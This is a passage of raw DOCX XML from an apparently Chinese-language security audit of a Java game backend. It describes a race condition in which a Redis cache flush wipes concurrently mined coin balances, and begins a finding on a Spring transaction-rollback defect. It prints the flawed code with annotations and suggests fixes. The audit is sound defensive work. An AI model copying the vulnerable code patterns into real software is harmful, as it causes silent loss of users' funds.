        <w:numPr>
          <w:numId w:val="1217"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">类名 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>RedisMiningBalanceCache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>KEY_ACTIVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 活跃用户集合、每 3 秒一次的调度模式，均表明 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 是被游戏逻辑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>持续并发写入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的热字段；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1218"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>getUsersWithPending()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 返回非空集合这一事实，确认存在并发的 pending 累积路径；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1219"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>调度间隔 3 秒（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>FLUSH_INTERVAL_MS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）在高频挖矿场景下，窗口内 ΔP &gt; 0 的概率极高。</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数据流：挖矿累积写入（外部，未提供但由架构确认）→ Redis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>getPending()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 读取快照 → DB flush → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>afterFlush</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 无条件清零，ΔP 在此处静默丢失。</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1220"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>每次调度周期内，用户在 T₁~T₃ 窗口（DB IO 延迟，典型值 10–100 ms）内积累的全部 ΔP 挖矿收益</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>永久丢失</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，无日志、无流水、无回滚；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1221"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在活跃挖矿场景（每秒产出 N 枚金币）下，每 3 秒调度周期最多可丢失 1 个完整秒的挖矿收益，长期累积损失可观；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1222"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>若游戏金币可兑换现实货币或道具，此为直接资金损失。</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调度任务入口：MiningScheduler.java</w:t>
              <w:br/>
              <w:t>@Scheduled(fixedRate = FLUSH_INTERVAL_MS)   // ← 每 3 秒触发</w:t>
              <w:br/>
              <w:t>public void flushCacheToDb() {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Set&lt;Long&gt; userIds = balanceCache.getUsersWithPending();  // ← 从 KEY_ACTIVE 读取待处理用户集</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (userIds.isEmpty()) return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (Long userId : userIds) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (userId == null) continue;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        try {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            BigDecimal pending = balanceCache.getPending(userId);  // ← T₁：读取 pending 快照值 P</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if (pending == null || pending.compareTo(BigDecimal.ZERO) &lt;= 0) continue;</w:t>
              <w:br/>
              <w:t xml:space="preserve">            // ↓ T₁ ~ T₃ 窗口：DB IO 期间，挖矿并发路径可向 Redis pending 追加 ΔP</w:t>
              <w:br/>
              <w:t xml:space="preserve">            BigDecimal newBalance = miningService.flushUserFromCache(userId, pending); // ← 以快照值 P 写入DB</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if (newBalance != null) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                balanceCache.afterFlush(userId, newBalance);  // ← T₃：污点传入，ΔP 将在此处被截断</w:t>
              <w:br/>
              <w:t xml:space="preserve">                balancePushService.pushBalance(userId, newBalance, null);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        } catch (Exception ignored) {}  // ← 异常全部吞噬，Redis 与 DB 状态不一致时无任何告警</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 漏洞点：RedisMiningBalanceCache.java</w:t>
              <w:br/>
              <w:t>@Override</w:t>
              <w:br/>
              <w:t>public void afterFlush(Long userId, BigDecimal newBaseBalance) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String key = balanceKey(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↓ 写入 DB 返回的新 base 余额（正确）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    redisTemplate.opsForHash().put(key, "base",</w:t>
              <w:br/>
              <w:t xml:space="preserve">        (newBaseBalance != null ? newBaseBalance : BigDecimal.ZERO).toPlainString());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↓ 漏洞核心：无条件覆盖写 "0"，不校验 pending 当前值是否仍等于 T₁ 时读取的 P</w:t>
              <w:br/>
              <w:t xml:space="preserve">    //   若 T₁~T₃ 窗口内并发挖矿已将 pending 增至 P+ΔP，ΔP 在此被静默抹除  ← TOCTOU 漏洞点</w:t>
              <w:br/>
              <w:t xml:space="preserve">    redisTemplate.opsForHash().put(key, "pending", "0");</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    redisTemplate.opsForSet()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>.remove(KEY_ACTIVE, String.valueOf(userId));  // ← 4 条 Redis 命令非原子</w:t>
              <w:br/>
              <w:t xml:space="preserve">    redisTemplate.expire(key, TTL_SECONDS, TimeUnit.SECONDS);</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问题复现时序（非 HTTP，无需 POC）：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1770"/>
        <w:gridCol w:w="2955"/>
        <w:gridCol w:w="1770"/>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时刻</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调度线程</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挖矿并发路径</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Redis pending</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T₁</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getPending()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 读取 → P=10</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T₂</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flushUserFromCache(10)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 执行中（DB IO）</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追加挖矿 +5</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15</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T₃</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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afterFlush</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> → put("pending","0")</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0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> ❌（丢失 5）</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T₄</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DB balance = old+10</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pending=0，5 枚金币永久丢失</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r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1223"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是否需要登录：否（内部调度任务，自发产生）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1224"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>触发条件：系统高并发运行时自然产生，无需外部攻击者介入，活跃用户挖矿频率越高，损失越大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修复建议方向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（供参考）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">应使用 Lua 脚本原子性地执行「读取 pending 当前值 → 与期望值比对 → 清零」（Redis CAS 模式），或改为原子 GETDEL 后仅清除已确认入库的 P，而非盲目写 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>"0"</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225"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MiningScheduler.java.flushCacheToDb → RedisMiningBalanceCache.java.afterFlush → RedisMiningBalanceCache.java.balanceKey</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audit_m263_1146_flushCacheToDb_ctrl-path12of13.md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：PowerScheduler.java#resetExpiredCharging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_58" w:id="58"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞57：定时任务 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 内 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PROPAGATION_REQUIRED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 内嵌调用 + 异常吞噬导致事务 rollback-only，充电过期重置失败并造成算力数据长期脏读</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="122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resetExpiredCharging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 事务传播缺陷导致充电状态永久无法重置及用户算力数据持续虚高</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="122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src/main/java/com/gameBack/mjservice/scheduler/PowerScheduler.java:resetExpiredCharging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="122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：事务管理缺陷 / 资金数据完整性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="122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3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：无需（定时任务，系统内部周期触发）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1231"/>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resetExpiredCharging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 同时标注 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Scheduled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，在 Spring AOP 代理下两者可协同工作，外层事务正常开启。循环内调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>minerService.recalcUserLevelAndHashRate(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，该方法同样标注 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>默认传播级别 `PROPAGATION_REQUIRED`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，因此会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>加入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>外层已存在的事务，两者共享同一个物理数据库事务。</w:t>
      </w:r>
    </w:p>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recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 内部任意位置抛出 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>RuntimeException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（例如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userSeasonService.updateSeasonData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 调用下游服务失败、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中资金写入异常、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 锁超时等），Spring 事务切面在异常回溯给外层前，会对当前共享事务调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TransactionStatus.setRollbackOnly()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，将整个外层事务不可逆地标记为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>rollback-only</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外层 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>catch (Exception ignored) {}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 吞噬了该异常，代码流程继续执行（甚至继续处理下一个 userId），最终方法正常返回。此时 Spring 事务代理尝试 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>commit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，内部检测到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>rollback-only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 标记，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>强制触发全量回滚并抛出 `UnexpectedRollbackException`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，导致：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1232"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">循环内所有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
